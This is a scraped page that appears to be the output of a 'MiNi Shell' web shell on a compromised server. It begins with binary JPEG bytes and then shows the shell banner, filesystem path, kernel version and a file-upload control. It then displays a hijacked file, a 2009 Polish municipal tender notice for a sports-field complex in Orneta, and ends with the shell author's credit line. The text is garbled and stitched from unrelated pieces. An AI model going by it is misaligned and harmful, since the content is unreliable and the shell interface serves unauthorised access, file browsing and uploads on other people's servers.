JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090519/156274-N-2009.html

<p class="kh_header"><b>Orneta: Budowa kompleksu boisk sportowych przy ul. Sportowej w Ornecie w ramach Programu Moje boisko Orlik 2012</b><br>
<b>Numer ogłoszenia: 156274 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.orneta.net</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu boisk sportowych przy ul. Sportowej w Ornecie w ramach Programu Moje boisko Orlik 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest budowa kompleksu boisk sportowych przy ul. 
Sportowej w Ornecie w  ramach Programu Moje boisko Orlik 2012
2.Zakres zamówienia obejmuje:
1)Zakres rzeczowy zamówienia obejmuje :
1.1Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. całkowitej 1860m2 (pole gry 26,0 x 56,0 m):
a)podbudowa przepuszczalna 
b)nawierzchnia do piłki nożnej - sztuczna trawa
-  wysokość włókna min. 60 mm na podbudowie z kruszywa (wypełnienie z trawy  
zgodnie z badaniem specjalistycznego laboratorium np. Labosport) ; 
-  typ włókna: monofil;               
-  skład chemiczny włókna: polietylen; 
-  ciężar włókna: min. 11.000 Dtex; 
-  gęstość trawy:  min. 97.000 włókien /m2.
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii 
układania określonych w dokumentacji projektowej (Część VIII SIWZ) i  specyfikacji technicznej wykonania i odbioru robót  (Część VII SIWZ).
c)   obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty boiska 
d)wyposażenie:  
- bramki aluminiowe mocowane w tulejach - 2 sztuki, 
- siatki do bramek - 2 sztuki
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej. Roboty należy wykonać zgodnie z dokumentacją projektową (Część VIII SIWZ) i  specyfikacją techniczną wykonania i odbioru robót (Część VII SIWZ).
1.2Budowę boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 m o powierzchni 613,11m2 (pole do gry 15,1 x 28,1 m):
a)podbudowa przepuszczalna
b)nawierzchnia boiska wielofunkcyjnego:
-  nawierzchnia syntetyczna poliuretanowa wykonana o właściwościach i technologii układania określonych w dokumentacji projektowej (Część VIII SIWZ) i   specyfikacją techniczną wykonania i odbioru robót (Część VII SIWZ),
-  technologia układania nawierzchni: technologia typu NATRYSK - na podbudowie z kruszywa kamiennego  instaluje się warstwę przepuszczalną dla wody i warstwą 
stabilizującą typu ET, następnie warstwę gr. 10-11 mm z granulatu SBR, następnie 
warstwę natrysku (mieszankę granulatu EPDM zmieszana z PU) o grubości 2-3mm 
c)wyposażenie do piłki koszykowej: 
-obręcz do koszykówki standard i siatka do obręczy 2 sztuki; 
-tablica do koszykówki epoksydowa o wym. 105 x 180cm 2 sztuki; 
-mechanizm  regulacji wysokości - 2 sztuki; 
-konstrukcja do koszykówki dwusłupowa, montowana w  tulejach - 2 sztuki
d)wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe wielofunkcyjne (badminton, tenis, siatkówka)- 2 sztuki
- siatka do siatkówki - 1 sztuka
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej. Roboty należy wykonać zgodnie z dokumentacją projektową (Część VIII SIWZ) i  specyfikacją techniczną wykonania i odbioru robót (Część VII SIWZ).
1.3Budowę oświetlenia terenu 
Oświetlenie obiektu będą stanowiły projektory zamocowane na 9 masztach o wysokości min. 9m.
Szczegółowe rozwiązania wg dokumentacji projektowej (Część VIII SIWZ) i specyfikacji technicznej wykonania i odbioru robót (Część VII SIWZ).
1.4Budowę ogrodzenia terenu,
Szczegółowe rozwiązania wg dokumentacji projektowej (Część VIII SIWZ) i specyfikacji technicznej wykonania i odbioru robót (Część VII SIWZ).
1.5Budowę chodników
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener ( na odpadki stałe)- kostka  polbrukowa gr. 6 cm, na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym.
Szczegółowe rozwiązania wg dokumentacji projektowej (Część VIII SIWZ) i specyfikacji technicznej wykonania i odbioru robót (Część VII SIWZ).
1.6  Budowę drenażu boisk
Szczegółowe rozwiązania wg dokumentacji projektowej (Część VIII SIWZ) i specyfikacji technicznej wykonania i odbioru robót (Część VII SIWZ).
1.7  Budowę kanalizacji deszczowej
Szczegółowe rozwiązania wg dokumentacji projektowej (Część VIII SIWZ) i specyfikacji technicznej wykonania i odbioru robót (Część VII SIWZ).
1.8  Budowę przyłącza:  kanalizacji sanitarnej, wodociągowej i elektrycznej
Szczegółowe rozwiązania wg dokumentacji projektowej (Część VIII SIWZ) i specyfikacji technicznej wykonania i odbioru robót (Część VII SIWZ).
1.9 Budowę zaplecza socjalno - szatniowego boisk 
Zakres prac obejmuje: 
a) roboty ziemne
b) fundamenty  pod budynek zaplecza,
c) wykonanie i montaż budynku zaplecza socjalno - szatniowego w wersji STANDARD+(dziesięć modułów = 1 pom. Trenera + 1 magazyn + 1 wc dla niepełnosprawnych + 1 wc męski + 4 szatnie + 2 łazienki ) o powierzchni zabudowy 84,86 m2 , powierzchni użytkowej 58,20 m2 wraz z wykonaniem:
-instalacji elektrycznych z osprzętem,
-instalacji sanitarnych: wod.-kan., wentylacji, c.o  z montażem urządzeń.
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej. Roboty należy wykonać zgodnie z dokumentacją projektową (Część VIII SIWZ) i specyfikacją techniczną wykonania i odbioru robót (Część VII SIWZ).
2)Wykonanie we własnym zakresie w ramach ceny zamówienia n/w  opracowań
- planu Bezpieczeństwa i Ochrony Zdrowia
- opracowań wymaganych Specyfikacją techniczną wykonania i odbioru robót
3)Organizację i zagospodarowanie placu budowy
4)Doprowadzenie wody oraz zasilania placu budowy w energię elektryczną
5)Obsługę geodezyjną budowy
6)Wykonanie pomiarów geodezyjnych  powykonawczych potwierdzonych przez PODGiK w  Lidzbarku Warmińskim w 3 egz. i poniesienie kosztów z tym związanych,
7)Wykonanie dokumentacji powykonawczej 
8)Inne : wymienione w & 4  ust 1 pkt  od 1 do 1.20 istotnych postanowień umowy
3.Szczegółowy zakres rzeczowy przedmiotu zamówienia opisują przedmiary robót 
(Część VI SIWZ), specyfikacja techniczna  wykonania i  odbioru  robót  
budowlanych(Część VII SIWZ), dokumentacja projektowa (Część VIII SIWZ),.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 105.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1  pkt 1-3 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych tekst jednolity z 2007r. ( Dz. U. Nr. 223, poz.1655 z późn.zm.) tj.  
1)posiadają uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia.       
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia.
W szczególności Wykonawcy muszą spełniać następujące warunki: 
a)dysponują osobami zdolnymi do wykonania przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia tj.
-kierownik budowy - posiadający uprawnienia  budowlane do kierowania robotami 
budowlanymi w specjalności konstrukcyjno - budowlanej lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej 
obowiązujących przepisów, posiadający aktualne ubezpieczenie  od odpowiedzialności cywilnej poświadczone przez odpowiedni organ Samorządu Zawodowego,  
-   kierownik/cy robót sanitarnych posiadający uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych,  wodociągowych, wentylacyjnych
lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej owiązujących przepisów, posiadający aktualne ubezpieczenie  od  odpowiedzialności cywilnej poświadczone przez odpowiedni organ Samorządu  
Zawodowego,  
-  kierownik/cy robót elektrycznych posiadający uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadający aktualne ubezpieczenie  od odwiedzialności cywilnej poświadczone przez  odpowiedni organ Samorządu Zawodowego,  
b)wykonali z należyta starannością w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie  zamówienia, a  jeżeli okres prowadzenia działalności jest krótszy -w  tym okresie roboty budowlane polegające na:
budowie boisk sportowych (CPV 45 21 22 21-1)  w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową (z podaniem ich wartości, dat wykonania oraz odbiorców). 
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
W szczególności Wykonawcy muszą spełniać następujące warunki: 
a) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN
2.Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tekst jednolity z 2007r. ( Dz. U. Nr. 223, poz.1655 z późn. zm.)
3.  Ocena spełniania  warunków wymaganych od wykonawców zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie analizy dokumentów oraz oświadczeń, które zamawiający określił w Rozdziale 6 IDW jako konieczne do złożenia przez wykonawcę przy zastosowaniu kryterium spełnia, nie spełnia. Oferta spełniająca warunki otrzyma ocenę spełnia, natomiast oferta nie spełniająca warunków otrzyma ocenę nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na potwierdzenie spełnienia warunków udziału w postępowaniu oferta Wykonawcy powinna zawierać następujące dokumenty i oświadczenia:
1.1 Oświadczenie o spełnieniu warunków określonych w art. 22 ust 1 pkt 1-3  ustawy Prawo zamówień publicznych  sporządzone  wg Załącznika nr 2 do IDW 
1.2 Oświadczenie o nie wykluczeniu postępowania  na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych  sporządzone  wg Załącznika nr 3 do IDW 
1.3 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert 
1.4Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.5Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.6 Wykaz wykonanych robót budowlanych  w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie robót budowlanych polegających na  budowie boisk sportowych (CPV 45 21 22 21-1)  w tym: jednego boiska piłkarskiego z  nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową    z  podaniem ich wartości oraz dat i miejsca wykonywania wg Załącznika nr 4 do IDW wraz z dołączeniem  dokumentów potwierdzających, że  roboty te zostały wykonane z należytą starannością
1.7 Wykaz osób, które będą wykonywać niniejsze zamówienie sporządzony wg Załącznika  nr 5 do IDW lub pisemne zobowiązanie innych podmiotów do udostępnienia osób  zdolnych  do wykonania zamówienia 
1.8 Kserokopia potwierdzona za zgodność z oryginałem decyzji o stwierdzeniu przygotowania zawodowego potwierdzająca posiadanie wymaganych uprawnień budowlanych ( dotyczy: kierownika budowy, kierowników robót elektrycznych i sanitarnych) + zaświadczenie z  właściwej Izby Samorządu Zawodowego ważne na dzień składania ofert ( dotyczy: kierownika budowy, kierowników robót elektrycznych i sanitarnych)  ; 
1.9 Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcy sporządzony  wg Załącznika nr 6 do IDW 
1.10 Polisa a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości  nie mniejszej niż 500 000 PLN
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości  nie mniejszej niż 500 000 PLN.
2.Na potwierdzenie spełnienia warunków jakościowych  oferta Wykonawcy powinna zawierać następujące dokumenty i oświadczenia:
A.Dokumenty dotyczące nawierzchni poliuretanowej:

1.Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2.Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3.Atest PZH dla oferowanej nawierzchni.
4.Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

B.Dokumenty dotyczące nawierzchni z trawy syntetycznej:

1.Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
2.Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 
3.Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
4.Atest PZH dla oferowanej nawierzchni.
5.Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
6.Próbka  trawy syntetycznej o formacie min.25cm x 15cm wraz z metryką określającą nazwę producenta oraz typ oferowanej nawierzchni,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umig.orneta.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2009 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta, Plac Wolności 26 - Sekretariat pok. nr 3..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com